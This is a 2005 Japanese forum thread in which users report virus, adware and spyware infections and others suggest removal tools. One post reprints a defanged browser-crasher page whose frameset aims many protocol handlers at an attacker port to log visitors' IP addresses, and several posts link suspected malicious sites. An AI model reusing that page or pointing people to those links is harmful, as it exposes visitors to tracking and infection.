517名無しさん@お腹いっぱい。:2005/05/23(月) 13:53:32
【使用OS】 windows XP
【WindowsUpdateしてるか】 ここ数ヶ月していません
【AntiVirusは何を使っているか】 AVGです
【ちゃんとUpdateしてるか】 AVGのUpdateならしています
【スキャンした結果(ウイルス名・発見場所)】
     Trojan hourse downloader で
場所はC:\temp\optimize.exe(←うろ覚えで、確かではないです…)
【別のオンラインスキャンしたならその結果は】 まだしていません。
【症状を具体的に、分かる限りすべて書く】 特にないです。
【何をしたらそんなことになったのか】
     ブリトニースピアーズの英語の歌詞をヤフーで調べていて
     偶然出てきたページにアクセスしたところ、
     AVGが「ウィルスがありますよ!」みたいなことを警告してきました。
     コンティニューを押せば良いかな?と思って、コンティニューボタンを
     押したら、どうやらそのまま感染したようです。
     因みに、これがそのページです。
     (tp://www.lyriclovers.com/song/SPEARS,_BRITNEY/I'll_Never_Stop_Loving_You)
【これまでにとった措置】
     AVGのスキャンをして、一応ファイルを削除しました。
【その他の質問】
     削除をしただけで、大丈夫なのでしょうか・・・?
     トロイの木馬らしいのですが、ネットで
     Trojan hourse downloaderと検索しても、ヒットしません。
             ↑downloaderというのもウィルス名の一部なのでしょうか?
518名無しさん@お腹いっぱい。:2005/05/23(月) 14:20:37
>>517
ttp://www.lyriclovers.com/search.php
さてはこいつだな
レジストリ内を「optimize.exe」で検索して全部削除すれば解決
レジストリ内に記述がなければ未感染だから、
ファイルを削除すれば解決
519517:2005/05/23(月) 15:14:53
>>518
ありがとうございます!

520名無しさん@お腹いっぱい。:2005/05/23(月) 15:51:07
age
521名無しさん@お腹いっぱい。:2005/05/23(月) 18:10:12
困っています(´・ω・`)、どなたかお力添えお願い致しますm(_ _)m

【使用OS】 XPSP2
【WindowsUpdateしてるか】 している(午前中2ヶ月ぶりに)
【AntiVirusは何を使っているか】 ノートン
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】
ウィルス名:Adware.Iwantsearch と VBS.Network
発見場所:前者はC:/WINDOWS/Download Program Files/webdlg32.dll
後者はC:/Documents and Settings/Owner/Local Settings/Temporary Internet Files/content.IE5/
JOWS59VU/manage[4].htm
【別のオンラインスキャンしたならその結果は】 してません
【症状を具体的に、分かる限りすべて書く】 上記ウィルスがどんなものかも分かりません。
                     ただ、最近PCが熱くなりすぎて困ってます。低温火傷するのではないかと。
【何をしたらそんなことになったのか】 普通にしようしていて
【これまでにとった措置】 2chの初心者質問スレで質問、回答なし_| ̄|○
【その他の質問】 上記ウィルスを駆除するには? PCが熱くなりすぎるのもウィルスのせいか?

以上よろしくお願い申し上げますm(_ _)m
522名無しさん@お腹いっぱい。:2005/05/23(月) 18:14:30
523名無しさん@お腹いっぱい。:2005/05/23(月) 18:31:39
日本語によるWindows XP SP2のお知らせを装ったウイルス「TROJ_VIPERIK.A」
ttp://internet.watch.impress.co.jp/cda/news/2005/05/23/7702.html
524名無しさん@お腹いっぱい。:2005/05/23(月) 18:35:51
>>521
Windowsフォルダ内にあるんだろうから、
regsvr32 /u webdlg32.dll
これで通常はアンインストール出来る。
エラーを吐く悪質なのはツールで削除した方がいい。
もう一つはキャッシュ内のHtmlファイルだから、そのまま削除すればいい。
525517:2005/05/23(月) 22:22:31
トロイの木馬は追い出したのですが・・・
今になって
「問題が発生したためiexplore.exeを終了します。−略ー」と出てきます。
手当たりしだいの対策(クッキー・一時ファイルを削除など)をしたのですが
改善されない・・。もしやトロイの木馬のせいなのだろうか
526名無しさん@お腹いっぱい。:2005/05/23(月) 22:38:10
527名無しさん@お腹いっぱい。:2005/05/23(月) 22:38:57
>>525
じゃあ他にスパイウェアも入っているな
Ad-awareとspybotで削除するもよし、
システムの復元で一気に直してしまうのもよし
528名無しさん@お腹いっぱい。:2005/05/23(月) 22:50:43
教えて下さい。
先日よりプログラムファイルにBullsEye Network
と言うフォルダが出来て、頻繁にポップアプ広告が開き、
HDDが動きっぱなしです。ペストパトロールやAd-awareで
削除しても再起動でまた復活します。
どなたか消し去る方法を教えて下さい。m(__)m
529528:2005/05/23(月) 22:53:28
OSはXPのホームでウィルスバスター2004を使ってます。
OSも2004も正規品でちゃんとアップデートしています。
530名無しさん@お腹いっぱい。:2005/05/23(月) 22:54:37
531名無しさん@お腹いっぱい。:2005/05/23(月) 22:56:44
>>528
BullsEye Network でぐぐったらいっぱい出てくるけど?
ewidoでスキャンもしてみ
532507&508:2005/05/23(月) 23:04:19
>>510

510さん、詳しい解説、分析本当にありがとうございます。

>間違いなくスパイウェアです。害が出るのは、対策ソフトと称するソフトを実行してから本格化するのが特徴です。

何もわからない私でさえおかしいと感じているのに、出たメッセージをコピーして見せ、システムに相談してところ
プロバイダからの指示ではないか?メッセンジャーを使わなければ大丈夫と放置されました。
本当に何もしなければ大丈夫なんでしょうか?

>対策としては、再インストールを強くお勧めします。

再インストールとはリカバリのことですよね?すべてシステムが握っているため自由になりません。

>なぜなら、スパイウェアは多岐にわたる上に、対応が非常に難しいものが多いからです。
社用のPCであれば、とても悠長に駆除している暇はありません。すぐに再インストールして、ください。

スパイウェアの話もしたのですが、埒があかず、社内PCとはいえ、LAN接続していないので
まったく無視されています。
再インストール以外に方法はないでしょうか?
手元に2000の使用していない(PCが壊れてしまったので、ライセンスに問題はないと思います)
CD−ROMがありますが、やはりダメでしょうか?
特殊な接続なので社内のシステム以外に専門業者に頼むことがあるのですが、リカバリCDがなくてもその業者に頼めば退治することは出来ないでしょうか?
533507&508:2005/05/23(月) 23:06:30
507にも書きましたが、違うPCでこのサイトのファイルをダウンロードしてしまいました。
開かずに保存のみで、すぐに怪しいと思い捨てましたが、大丈夫でしょうか?

アダルトサイト接続や、ダイヤルアップなので通信が遅く、ファイルをダウンロードした覚えは
まったくないのですが(2chのカキコ程度はしましたが)
他の人が社内LANに繋いで使っていたPCのお下がりがまわって来ているので、どこでどう感染したのかわかりません。
また、このPC特定の業者との通信に使っているため、常にその業者の専用プロバイダを使ってデータの送受信をしています。
誰もが知っている会社なのですが、そこが狙われてこちらのPCに感染したということは考えられますか?
教えてチャンで申し訳ありませんが、
よろしくお願いいたします。

今日もまた似たようなメッセージが出て、同じサイトからダウンロードするようにメッセージが出ました。
今日も古いマカフィーでチェックしたところ、感染なし出ました。
534名無しさん@お腹いっぱい。:2005/05/23(月) 23:26:50
http://www.tv-taro.com/
すみません。このサイトを踏んでしまったのですが
どのような害があるのでしょうか?

OSのパッチは全て当てております。
ただいまウイルススキャン中です。
535名無しさん@お腹いっぱい。:2005/05/23(月) 23:30:12
>>533さん。>>510は完全無視ですか・・・・

おまえみたいなクズは完全無視。もう絶対に答えない。
536名無しさん@お腹いっぱい。:2005/05/23(月) 23:49:02
>>534
無害
ブラクラ厨房ホイホイバージョン
537名無しさん@お腹いっぱい。:2005/05/23(月) 23:50:03
>>534
内部ソース 一部書き換えて不活性化させています。

<html>
<frameset rows="100%,0,0,0,0,0,0,0,0,0">
<frame src="http;//www.tv-taro.com/index.cgi?mode=ipget&port=7848">
<frame src="ftp;//www.tv-taro.com:7848/" scrolling=no noresize>
<frame src="gopher;//www.tv-taro.com:7848/" scrolling=no noresize>
<frame src="https;//www.tv-taro.com:7848/" scrolling=no noresize>
<frame src="pnm;//www.tv-taro.com:7848/pnmiptrace" scrolling=no noresize>
<frame src="mms;//www.tv-taro.com:7848/mmsiptrace" scrolling=no noresize>
<frame src="rlogin;//www.tv-taro.com:7848/" scrolling=no noresize>
<frame src="tn3270;//www.tv-taro.com:7848/" scrolling=no noresize>
<frame src="telnet;//www.tv-taro.com:7848/" scrolling=no noresize>
<frame src="news;//www.tv-taro.com:7848/" scrolling=no noresize>
</frameset>
</html>

ちなみに、検索すれば、するほど・・・でした。
538534:2005/05/24(火) 00:04:09
>>536-537
ありがとうこざいます。
ブラクラ厨房ホイホイバージョン?ですか、、

ええと、、これって要するに踏んだ人をびびらせるだけのブラクラで無害
ということですか?
539名無しさん@お腹いっぱい。:2005/05/24(火) 00:15:54
WORM_AGOBOT.AUVっていう種類のワームが見つかったんですけど、新種のようで駆除情報が検索しても見つからないんですが、知ってる方は情報ください。
540名無しさん@お腹いっぱい。:2005/05/24(火) 00:44:11
>>539
WORM_AGOBOT…P2P感染での質問はこの板ではご遠慮ください。
541名無しさん@お腹いっぱい。:2005/05/24(火) 00:52:07
【使用OS】MIN XP
【WindowsUpdateしてるか】 しています。
【AntiVirusは何を使っているか】 バスター2005(常駐)
【ちゃんとUpdateしてるか】 しています。
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
急にメールの受信ができなくなりました。送信、ネットは可。プロバイダーの
サポートに連絡したら、プロバイダーのHPにログインしてそこから
怪しいメールを削除してみてください。と言われたのですが
何度削除してもエラーになってしまって削除できないメールがあり、
そのメールは0KBと表示されていて添付もない。
試しに他のメールは全て削除してみたが症状が変わらず、
怪しいメールは「他の人が受信ファイルを使っている」という
表示とともに削除できずエラーに。
【何をしたらそんなことになったのか】
普通にいつもどおりメールの送受信をしたら、バスターが駆除できませんと
送受信を中断した。ウイルス名に「ワーム・ネットスカイ」と書いてあった。
【これまでにとった措置】
サポートに電話。こちらでは分からないということでした、ウイルスも
調べましたが、去年の2月付けになっていて最新型というものでもない様子。
PCはウイルススキャンをしましたが何も発見されていません。
【その他の質問】
とにかく、受信ができないので、その怪しいメールを削除したい。
542名無しさん@お腹いっぱい。:2005/05/24(火) 01:01:42
【使用OS】 WinMe
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 なし
【ちゃんとUpdateしてるか】 なし
【スキャンした結果(ウイルス名・発見場所)】 なし
【別のオンラインスキャンしたならその結果は】 シマンテック・トレンドマイクロ・Spybot 特に何も検知されず
【症状を具体的に、分かる限りすべて書く】
頻繁にエロメール(SPAMって云うのかな)が届くようになり、差出人は5人前後(美穂とか沙織とかそんなの)でアドレスは毎回ランダムで同じアドレスってのはありませんでした。
そんな按配なので同じプロバイダでメールアドレスだけを新しく変えたのですが、知人にアドレス変更の知らせを出す前に、同じ様なエロメールが届きました。アドレス変更してから6〜8時間くらいでです。
PC使用者はかなりのPC嫌いで、PCを立ち上げても株のオンライントレードとメール確認以外で使用する事はまずありません。
そんな状況で何故アドレス変更後、すぐに新しいアドレスにメールが来るのかが判りません。
この状況を改善するにはどうしたらよろしいでしょうか?
543名無しさん@お腹いっぱい。:2005/05/24(火) 01:18:55
>>542
単に、旧メールアドレスからフィードする設定を
したからです。
544名無しさん@お腹いっぱい。:2005/05/24(火) 01:22:46
>>539
どんな症状なのか教えれ。
もし、起動時にdos窓が開く(cmd.exeが実行される)のなら、対処方法はあるぞ。
545名無しさん@お腹いっぱい。:2005/05/24(火) 01:29:30
パソコンを買ったばかりの初心者なんですが、セキュリティソフトは何がおすすめですか?色々と自分でも調べたんですがいまいちよくわかりません。
546名無しさん@お腹いっぱい。:2005/05/24(火) 01:34:01
547539:2005/05/24(火) 01:41:04
とくにP2Pはやってないんですが、OS再インストしてしばらくウィルスバスター入れない状態で稼動してたのが悪かったのか、知人からもらったフリーのアプリとかが原因でしょうかね。
症状は、ネット接続してネトゲとかやってるとウィルスバスターのリアルタイム検索でatapidrv.exeってファイルが何度も引っかかります。
そのくらいなのでatapidrv.exeさえ弄らなきゃあんま害は無いと判断してるんですが、気持ち悪いので質問してみました。
548名無しさん@お腹いっぱい。:2005/05/24(火) 01:42:34
Trojan.ByteVerify とTrojan.Anicmoo というウィルスに
感染してしまいました。
ウィルスバスターを使っているのですが駆除できません。
トレンドマイクロのページで調べたら単純に削除してくださいと
書いてありましたが,その単純に削除する方法がわかりません。
どなたかよろしくお願いします。
549542:2005/05/24(火) 01:54:49
>>543
レスありがとうございます。
いつも通りにOutlookExpressの設定をしたつもりだったんですが・・・
よろしければ後学の為にどの段階で相手に知らせた(もしくは知らせる設定)になったのかご教示いただけると有り難いのですが。
550544:2005/05/24(火) 01:57:35
551名無しさん@お腹いっぱい。:2005/05/24(火) 02:05:08
>>549
相手ではなくて、自分。
自分が自分のプロバイダにそう設定したんです。

前にも全く同じことをしてた同僚が居たので、
前歯折れるぐらい殴ってやりました。
そんなんじゃ意味ないだろボケが!って。
552名無しさん@お腹いっぱい。:2005/05/24(火) 02:25:03
>>549
以前のアドレスに送られてきたメールの処理は、プロバイダーでどうするように設定したんだよ。
転送じゃ送られてくるに決まってるんだからな。
完全に決別して、自分のパソコンからその以前のアドレスに送っても
アドレス不明になるようにしとかなきゃならねえんだぞな。
553名無しさん@お腹いっぱい。:2005/05/24(火) 02:51:13
>>548
自己解決しました。
554541:2005/05/24(火) 10:24:19
分からないなら分からないと書いてください
他に行きたくてもマルチ扱いになってしまいます。
555名無しさん@お腹いっぱい。:2005/05/24(火) 10:47:37
>>541
そういうのってプロバイダで消してもらえないモノなんだろうか。
ソレがダメだから言ってるんだろうということにしますが、
Beckyのリモートメールボックス機能とか使って、そのメールを消してみては?
556名無しさん@お腹いっぱい。:2005/05/24(火) 12:42:30

【使用OS】 winxp
【WindowsUpdateしてるか】 してませんでした
【AntiVirusは何を使っているか】 いれていませんでした
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】できません
【症状を具体的に、分かる限りすべて書く】
PCがとても重くなる。シマンテックなどのサイトに
アクセスできない。ヤフーなどは見ることが出来る。
買ってあったノートン2005をインストールしようとしても
勝手に閉じてしまい、インすと出来ない。
【何をしたらそんなことになったのか】
自分が居た時ではないので、分からないのですが、
メッセンジャーをやっているときか、ソリティアをやっているときに 
なにかのダイアログが出て、OKを押したそうです。
それが原因ではないかと思います。
【これまでにとった措置】
今、べつのPC で解決法を探し中。
しかし、ノートンなどで削除というところがおおく、
ソレさえ出来ない状況で困っています。
どうか、ヨロシクオネガイシマス。
557名無しさん@お腹いっぱい。:2005/05/24(火) 13:09:17
ttp://67.18.194.222/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>If you can dream it, you can do it</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Cache-Control" content="no-cache">
</head>

<body>

<div align=center>
<h1>If you can dream it, you can do it</h1>
</div>
</body>
</html>

一番上のサイト踏んだらどうやらウイルス食わされたっぽいんですけど
下のがソースですけど、これはどっかの地雷に転送ってことでしょうか・・?
出てくるのは dropper ってやつです
558名無しさん@お腹いっぱい。:2005/05/24(火) 15:22:12
自分、ずっと最初からついてたアンチウィルスっていうのを使ってきたのですが
もうすぐ切れてしまいます。で今後は更新する(買う)気はありません。なので
無料のお勧めするやつを教えてください。お願いします。
559名無しさん@お腹いっぱい。:2005/05/24(火) 15:31:38
>>558
無料のものもありますが、件出が60%程度なので、お勧めしません。
大手三社のものをお買い上げください。
560名無しさん@お腹いっぱい。:2005/05/24(火) 15:37:05
トレンドマイクロ、シマンテック、・・・・?(´д`)
561名無しさん@お腹いっぱい。:2005/05/24(火) 15:40:55
>>560
トレンド、シマンテック、キヤノン(NOD32)
562名無しさん@お腹いっぱい。:2005/05/24(火) 15:43:15
>>561
キャノンΣ(;´Д`)
563561:2005/05/24(火) 15:51:04
冗談
マジレスすると
トレンド、シマンテック、マカフィ
いろいろ言うやつはいるけどこの3社のソフトは買ってもいいソフトである事は間違いないと思うな
断っておくが他のが駄目とは言ってないぞ
でもソースはやめとけよな
564名無しさん@お腹いっぱい。:2005/05/24(火) 17:08:02
>>563
純日本ソフトをそうやって誹謗するおまえは売国奴だな。
565名無しさん@お腹いっぱい。:2005/05/24(火) 18:20:48
>559 他
ありがとうございます。お金がないので無料のやつを教えてほしいのですが。
もちろん性能が劣っていてもかまいません。60パーセントのやつでもかまいません。
無料のお勧めのやつ教えて下さい。お願いします。
566名無しさん@お腹いっぱい。:2005/05/24(火) 18:51:50
>>565
一応AVG+BitDefender+オンラインスキャンを薦めておく。
あとは↓読んで自分で判断しろ。
ttp://pc8.2ch.net/test/read.cgi/sec/1107065884/l50
567名無しさん@お腹いっぱい。:2005/05/24(火) 18:56:41
>>564
でも、ウイルス検知技術はインドのアーユルヴェーダ理論に基づいてるんだろ?
568名無しさん@お腹いっぱい。:2005/05/24(火) 19:29:10
>>565
http://pc8.2ch.net/test/read.cgi/sec/1115369929/
ここらへん試してみて合わないようなら>>566のあげたスレで
自分の環境に合うのに切り替えてみればいいかと。
569名無しさん@お腹いっぱい。:2005/05/24(火) 20:12:53
最近直リン禁止を守らん馬鹿が多いな。
570初心者:2005/05/24(火) 20:35:00
すみません!教えてください。最近 hooowah searchのサイトが勝手に現れます。
これってウィルスに感染してるんですか?ノートンでは異常無しと出るのですが・・・
これを消す方法なんかありますか?どうぞよろしくお願いします
571名無しさん@お腹いっぱい。:2005/05/24(火) 20:51:04
572542:2005/05/24(火) 21:55:08
>>551-552
レスありがとうございます。
Outlookの方の設定じゃないんですね
プロバイダの方で特に転送するとかの設定とかがなかったような気がしました。
と、云うかメアド変更ってサービスが無く、アドレス削除→新アドレス登録って感じで、旧アドレスの方は削除した月の月末まで有効という流れです。
573名無しさん@お腹いっぱい。:2005/05/24(火) 22:57:11
>>570
とりあえずAd-awareとか使ってスパイウェアもチェック。
あと、スペル間違ってるとかないよね?
サイトは確かに確認できたんだが、検索結果があまりにも少な過ぎる・・・
5741年前の話:2005/05/24(火) 23:47:17
一年前の話なのですが、、、

【使用OS】 WindowsXP SP1
【WindowsUpdateしてるか】 してました。
【AntiVirusは何を使っているか】 そのころは使っていませんでした。
【ちゃんとUpdateしてるか】 していません。
【スキャンした結果(ウイルス名・発見場所)】 全くわかりません。
【別のオンラインスキャンしたならその結果は】 やっていません。
【症状を具体的に、分かる限りすべて書く】
電源を付け、ログインするとデスクトップに「あぼ〜ん」と表示された窓がでてきました。
なんか嫌な予感がしたのでOKを押さずに消しました。するとその直後いきなり
HDDが轟音をあげました。おかしいと思いマイコンのHDD残量をみてみると
どんどん多くなっていきました。ファイルがどんどん消されていき、
結局すべて消され、OS自体も立ち上がらなくなりました。
【何をしたらそんなことになったのか】
まったくわからないです。その頃は本当になにもわからなかった。
(PC買って間もなかったし)
575名無しさん@お腹いっぱい。:2005/05/25(水) 08:11:07
>>574
だからなんだ
576名無しさん@お腹いっぱい。:2005/05/25(水) 08:34:19
>>564
んじゃあ「純国産」のソフトってどれよ
ちょっと興味あるな
577名無しさん@お腹いっぱい。:2005/05/25(水) 11:14:19
age
578名無しさん@お腹いっぱい。:2005/05/25(水) 11:23:21
>>576
彼の脳内での純国産はウイルスセキュリティです
5791年前の話:2005/05/25(水) 16:03:41
>>575なんていうウィルスだったのかが知りたいんですが、、
580名無しさん@お腹いっぱい。:2005/05/25(水) 16:09:51
>>579
それ最初に言わんかい。>>575みたいなレスが返ってきて当然やん。
5811年前の話:2005/05/25(水) 17:08:58
>>580ごめんなさい。

それで結局どんなウィルスだったのでしょうか?
気になります。調べてみたんですが、わかりませんし、、
582名無しさん@お腹いっぱい。:2005/05/25(水) 17:17:15
>>581
Antinny系だと思うけど、亜種が多すぎてわからん。
583名無しさん@お腹いっぱい。:2005/05/25(水) 17:58:10
>>581
HDDあぼ〜んウイルス

といって、非常に有名なものです。
ttp://pc.2ch.net/sec/kako/1024/10249/1024943662.html
584初心者:2005/05/25(水) 18:13:00
>>573
どうも有り難う御座いました!Ad-awareを試して見ました。いっぱい出てきてちょっとびっくりしています。
全部削除して、今の所問題無いみたいです。このまま様子を見て、また連絡します。
585名無しさん@お腹いっぱい。:2005/05/25(水) 18:13:08
>>564
インドだしw
586名無しさん@お腹いっぱい。:2005/05/25(水) 18:18:20
>>585
そういうホラを・・・
587名無しさん@お腹いっぱい。:2005/05/25(水) 18:25:33
HDD上のファイルを人質に“身代金”要求する新手の攻撃
http://www.itmedia.co.jp/enterprise/articles/0505/25/news007.html
588名無しさん@お腹いっぱい。:2005/05/25(水) 19:53:15
>>586
585はホラじゃないよ(ウソだと思ったら調べてちょ)
5891年前の話:2005/05/25(水) 21:24:24
>>582、583
ありがとうございました!
590名無しさん@お腹いっぱい。:2005/05/25(水) 21:59:48
ヌルポ
591名無しさん@お腹いっぱい。:2005/05/25(水) 22:08:59
【使用OS】 winXP
【WindowsUpdateしてるか】 no
【AntiVirusは何を使っているか】Spy Sweeper
【ちゃんとUpdateしてるか】 yes
【スキャンした結果(ウイルス名・発見場所)】 CoolWebSearchというウィルスかも
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 IEを起動したら英語の変なページに飛ばされるのでCWShredderというソフトを
使ってみたらその症状は治ったのですが、他人の掲示板などに書き込む際私のURLを入力する欄に、
なにも入力せず白紙にしてるにも関わらず、色々なURLが勝手に書き込まれる症状が治りません。

【何をしたらそんなことになったのか】 不明
【これまでにとった措置】 CWShredderで除去
【その他の質問】 nine
592名無しさん@お腹いっぱい。:2005/05/25(水) 22:33:51
>>590
・・・・ガッ!
593名無しさん@お腹いっぱい。:2005/05/25(水) 23:20:46
>>591
CoolWebSearchはウイルスじゃないスパイウェア
セキュリィティホール開放っぱなしのままIE使用しているのか…ある意味勇者だな。
勇者なら其の位気にしてはいけない。…と思う。
594名無しさん@お腹いっぱい。:2005/05/25(水) 23:43:41
プロセスに「φφ←2.exe」という見慣れないものが動いているのですが、これはウィルスでしょうか?
φφ←の部分は小さい文字なので文字化けのような気もします
595ヂェード:2005/05/25(水) 23:44:57
 
596ヂェード:2005/05/25(水) 23:45:09
 
597名無しさん@お腹いっぱい。:2005/05/26(木) 00:19:51
マイドキュメントの中に
(・ё・)******.jpg
ってファイルがたくさん在ったんだけど、なにこれ?
598名無しさん@お腹いっぱい。:2005/05/26(木) 00:24:39
10GくらいHDの容量食われてんじゃないの?
599名無しさん@お腹いっぱい。:2005/05/26(木) 00:31:26
はい、ちょうどそのくらい取られてます。
600名無しさん@お腹いっぱい。:2005/05/26(木) 00:38:09
>>599
ノートンなら対応してるはず。
あとnyはやめとけ。
601名無しさん@お腹いっぱい。:2005/05/26(木) 00:41:11
マイドキュメントをスキャンしても何も起きないんだけど
jpgはそのまま消していいの?
602名無しさん@お腹いっぱい。:2005/05/26(木) 00:45:12
>>601
jpgを削除しても数分後にまた作成されちゃう。
まずノートンでウィルス削除。
それからjpg削除でいいんじゃないかな。

これからは見知らぬexeを実行しないこと!
603名無しさん@お腹いっぱい。:2005/05/26(木) 00:56:56
>>601
いますぐny止めろ。流出してる可能性も高い。
604名無しさん@お腹いっぱい。:2005/05/26(木) 01:00:23
>>603
山田ウィルスかもしれないってこと?
605名無しさん@お腹いっぱい。:2005/05/26(木) 01:07:34
Antinyじゃね?
606名無しさん@お腹いっぱい。:2005/05/26(木) 02:35:06
>>599
>>600
それは10GBのupdate***.logが作られるヤツとは違うの?
一緒だとしてもウィルスバスターじゃ無理なのかぁ。
607名無しさん@お腹いっぱい。:2005/05/26(木) 03:08:34
>>606
亜種が多すぎ。最近のも対応してないのが多い。
ヒューリスティックで優秀なのはNOD32だから、
それとか使って防衛するしかない。
608名無しさん@お腹いっぱい。:2005/05/26(木) 09:48:04
ダウソ板へsage(・∀・)カエレ!
609名無しさん@お腹いっぱい。:2005/05/26(木) 10:21:06
>>606
それはバスターは対応できないのは確認済みなのか?
ところでNODのヒューリスティックはあんちにぃに反応してくれるの?
610名無しさん@お腹いっぱい。:2005/05/26(木) 10:30:17
>>609
亜種にも完全に補足してる。他の大手3社が亜種に無力なのに比べると驚く。
611名無しさん@お腹いっぱい。:2005/05/26(木) 10:30:17
ヒューリスティックってのは個別定義ファイルで対応不能なものを
定義ファイルにヒューリスティックとして検出するロジックを登録しているんだと思う。
だから、元々未対応なものには対応出来ないよ。
612名無しさん@お腹いっぱい。:2005/05/26(木) 10:33:29
>>610
あんちにぃの話をしてるとゴルァされそうだが
知ってる限りでは山田の亜種はトレンドで対応したわけだが
NODではそれらも『ヒューリスティック』で対応できるわけね?
613名無しさん@お腹いっぱい。:2005/05/26(木) 16:38:30
【使用OS】 Windows 2000
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 avast! Antivirus 4.6 Home Edition
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 ウィルス名はわかりませんが、トロイの木馬などが5、6個検出されました
【症状を具体的に、分かる限りすべて書く】 PC起動後数十分〜数時間すると、
・IEで右クリックできなくなる&リンク先が表示されなくなる&ツールバーが消える&タブがクリックするごとに消える
・スタートメニューのプログラム〜シャットダウンボタンが消える
さらに時間が経つとIEに限らず右クリック不能になる
【何をしたらそんなことになったのか】 おそらく外国の怪しいサイトで証明書を承認したから
【これまでにとった措置】 「avast! Antivirus」でウィルス駆除 / spybotとSpywareBlasterでスパイウェア駆除
614名無しさん@お腹いっぱい。:2005/05/26(木) 17:17:00
>>613
avastの駆除%は確か60%程度のはず。
どうにもそれではダメだと思う。
615名無しさん@お腹いっぱい。:2005/05/26(木) 17:24:22
>>613
フリーでまかないたいならBitDefenderでも使えば?
後は非常にトロイ臭がするのでアンチトロイも勧める
あと他のベンダーのオンラインスキャンでもしる!
そしてなにより何でもかんでもクリックするな!
616名無しさん@お腹いっぱい。:2005/05/26(木) 20:56:41
Spybotを使ってスパイウエア駆除したのに
ポップアップで色んな広告が入ってきます
再度Spybotで検索しても全て駆除したとのメッセージ・・・
セキュリティーで制限付きサイトにも登録したけど・・・無駄みたい・・
どうしたらいいの?
617名無しさん@お腹いっぱい。:2005/05/26(木) 21:07:36
>>616
ポップアップをブロックすればイイのでは?
618名無しさん@お腹いっぱい。:2005/05/26(木) 21:33:44
トレンドマイクロがまたウイルスバスターの不良パッチ送信か?
http://news19.2ch.net/test/read.cgi/news/1117110207/
619名無しさん@お腹いっぱい。:2005/05/26(木) 22:16:21
>>616
SpybotよりAd-awareの方が検出力高いよ。
それにスパイウェアじゃなくてもポップアップ広告が出るサイトもある。
広告がうざいなら>>617の言う通りポップアップブロックを有効にするか、タブブラウザで個別に抑制設定してやればいい。
620名無しさん@お腹いっぱい。:2005/05/27(金) 00:01:28
広告でるのはアドウェア
621名無しさん@お腹いっぱい。:2005/05/27(金) 09:36:55
使用OS】 WinXP
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 なし
【ちゃんとUpdateしてるか】 なし
【スキャンした結果(ウイルス名・発見場所)】 なし
【別のオンラインスキャンしたならその結果は】
プログラムファイルの中にxeroxというタイトルでファイルがあった
中にはなにもなし nwwiaとかいうわけのわからないの
【症状を具体的に、分かる限りすべて書く】いまのとこ特になし
【何をしたらそんなことになったのか】 かなり昔のようで詳細は覚えていません
【これまでにとった措置】 ファイルの削除を試みたんですが
nwwiを削除できません。他の人またはプログラムによって使用されています。
プログラムを使用している可能性がある場合終了してから〜と表示されるんですが
他のを実行していないにもかかわらず削除できません、どうしたらいいでしょうか
622名無しさん@お腹いっぱい。:2005/05/27(金) 10:13:22
>>621
WindowsR XPでの"\Program Files\Xerox\nwwia"フォルダーについて
http://www.fujixerox.co.jp/release/2001/1228_nwwia.html
623名無しさん@お腹いっぱい。:2005/05/27(金) 10:31:01
>>622
ありがとうございましたー!

他にウィルス検知やったらでるわでるわで53種もorz
フリーソフト使って駆除してきます
624名無しさん@お腹いっぱい。:2005/05/27(金) 11:05:21
age
625名無しさん@お腹いっぱい。:2005/05/27(金) 12:12:02
【使用OS】 WINme
【WindowsUpdateしてるか】 していない
【AntiVirusは何を使っているか】なし
【ちゃんとUpdateしてるか】 なし
【スキャンした結果(ウイルス名・発見場所)】 不明
【別のオンラインスキャンしたならその結果は】 不明
【症状を具体的に、分かる限りすべて書く】 起動すると勝手にFree XXXというブラウザが起動してしまう。他に、インストールした記憶は無いのですがSpywereAvengerというソフトも起動します。
それとココに書き込む際「公開PROXYからの投稿はできません」と出ました。今は知人のパソコンから書き込ませて貰ってます。
【何をしたらそんなことになったのか】 ttp://dayoore.hp.infoseek.co.jp/cgi-bin/imgboard.cgi
のSD画像掲示板を開いたらなにやら勝手にダウンロード、セットアップされてしまったようです。
【これまでにとった措置】 Ad-Aware seというソフトでウイルスチェックをしようと試みましたが途中でフリーズしてしまいました。
どうかよろしくお願いします。
626名無しさん@お腹いっぱい。:2005/05/27(金) 12:38:01
>>625
OSのアップデートはしてないし、ウイルス対策してないし・・・
まあ、セーフモードでAdでチェックしてみれば。
ネットがつながるなら、トレンドやシマンにいってオンラインスキャン、そして体験版インスコだな。
その体験版で何とかしなよ。
素っ裸で外をうろつかないほうがいいよ。
627名無しさん@お腹いっぱい。:2005/05/27(金) 13:00:52
>>626
ご忠告ありがとうございます。肝に命じます。
セーフモードでシステムの復元を試みた処、普通に起動するようになりました。
ですが怪しげなファイルやフォルダはそのまま残っています。
とりあえずオンラインスキャンを試してみます。
628名無しさん@お腹いっぱい。:2005/05/27(金) 13:44:47
>>627
そのままでは、情報がガンガンアップされたり漏れてる可能性が高いので、
すぐに使用を中止したほうがいいと思うけど・・・
629名無しさん@お腹いっぱい。:2005/05/27(金) 15:13:42
tp://virus.org.ua/unix/woid.jpg

これってどんなウィルスなんですか?
630名無しさん@お腹いっぱい。:2005/05/27(金) 15:15:08
スレ違い乙
631☆彡:2005/05/27(金) 18:18:04
625さん、
私も全く同じことになりました。Free XXXです。私もme使ってて 最後には起動しなくなりました…
632名無しさん@お腹いっぱい。:2005/05/27(金) 18:56:59
>>629
つまんねえ 自分踏めばいいのに
633名無しさん@お腹いっぱい。:2005/05/27(金) 19:32:27
>>629
SymantecでHacktool.Dosってのだな。
634名無しさん@お腹いっぱい。:2005/05/27(金) 22:02:47
Mozilla Firefox は「画像ファイル "http://virus.org.u
a/
unix/woid.jpg" は壊れいているため、表示できませんでした。」て言うぞ (´Д`)y-~~~~
635名無しさん@お腹いっぱい。:2005/05/27(金) 22:04:54
